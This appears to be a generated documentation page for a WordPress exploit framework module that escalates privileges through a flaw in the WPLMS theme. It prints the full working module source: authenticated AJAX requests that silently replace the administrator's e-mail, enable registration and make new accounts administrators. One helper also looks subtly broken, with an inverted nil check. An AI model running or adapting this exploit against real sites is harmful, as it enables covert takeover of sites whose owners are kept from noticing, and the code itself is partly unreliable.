Class: Wpxf::Auxiliary::WplmsPrivilegeEscalation

Inherits:
Module
  • Object
show all
Includes:
Wpxf, Net::HttpClient, WordPress::Login
Defined in:
lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb

Constant Summary

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary collapse

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initializeWplmsPrivilegeEscalation

Returns a new instance of WplmsPrivilegeEscalation.



10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
 
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 10

def initialize
  super

  update_info(
    name: 'WPLMS Theme Privilege Escalation',
    desc: %(
      The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows
      an authenticated user of any user level to set any system option
      due to a lack of validation in the import_data function of
      /includes/func.php.

      The module first changes the admin e-mail address to prevent any
      notifications being sent to the actual administrator during the
      attack, re-enables user registration in case it has been
      disabled and sets the default role to be administrator.
      This will allow for the user to create a new account with admin
      privileges via the default registration page found at
      /wp-login.php?action=register.
    ),
    desc_preformatted: true,
    author: [
      'Evex',     # Vulnerability discovery
      'rastating' # WPXF module
    ],
    references: [
      ['WPVDB', '7785']
    ],
    date: 'Feb 09 2015'
  )
end

Instance Method Details

#checkObject 



41
42
43
 
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 41

def check
  check_theme_version_from_readme('wplms', '1.8.4.2', '1.5.2')
end

#php_serialize(value) ⇒ Object 



49
50
51
52
53
54
55
56
57
 
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 49

def php_serialize(value)
  # Only strings and numbers are required by this module
  case value
  when String, Symbol
    "s:#{value.bytesize}:\"#{value}\";"
  when Integer
    "i:#{value};"
  end
end

#requires_authenticationObject 



45
46
47
 
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 45

def requires_authentication
  true
end

#runObject 



89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
 
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 89

def run
  return false unless super

  new_email = "#{Utility::Text.rand_alpha(5)}@#{Utility::Text.rand_alpha(5)}.com"
  emit_info "Changing admin e-mail address to #{new_email}..."
  if set_wp_option('admin_email', new_email).nil?
    emit_error 'Failed to change the admin e-mail address'
    return false
  end

  emit_info 'Enabling user registrations...'
  if set_wp_option('users_can_register', 1).nil?
    emit_error 'Failed to enable user registrations'
    return false
  end

  emit_info 'Setting the default user role...'
  if set_wp_option('default_role', 'administrator').nil?
    emit_error 'Failed to set the default user role'
    return false
  end

  register_url = normalize_uri(full_uri, 'wp-login.php?action=register')
  emit_success 'Privilege escalation complete'
  emit_success "Create a new account at #{register_url} to gain admin access."

  true
end

#serialize_and_encode(value) ⇒ Object 



59
60
61
62
63
64
 
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 59

def serialize_and_encode(value)
  serialized_value = php_serialize(value)
  return nil unless serialized_value.nil?

  Base64.strict_encode64(serialized_value)
end

#set_wp_option(name, value) ⇒ Object 



66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
 
# File 'lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb', line 66

def set_wp_option(name, value)
  encoded_value = serialize_and_encode(value)
  if encoded_value.nil?
    emit_error "Failed to serialize #{value}", true
    return nil
  end

  res = execute_post_request(
    url: wordpress_url_admin_ajax,
    params: { 'action' => 'import_data' },
    body: { 'name' => name, 'code' => encoded_value },
    cookie: session_cookie
  )

  if res.nil?
    emit_error 'No response from the target', true
  elsif res.code != 200
    emit_warning "Server responded with code #{res.code}", true
  end

  res
end